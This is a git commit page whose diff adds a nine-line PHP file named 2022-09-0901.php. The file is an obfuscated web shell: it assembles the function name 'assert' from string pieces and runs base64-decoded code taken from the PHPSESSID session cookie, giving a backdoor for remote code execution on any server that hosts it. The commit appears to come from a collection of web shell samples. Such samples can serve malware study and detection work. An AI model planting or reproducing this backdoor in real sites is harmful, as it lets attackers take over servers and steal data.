tennc 2022-09-09 23:08:35 +08:00 committed by GitHub
parent f940970766
commit f06a40760e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

9
php/2022-09-0901.php Normal file
View file

@ -0,0 +1,9 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c(base64_decode($_COOKIE["PHPSESSID"]));
?>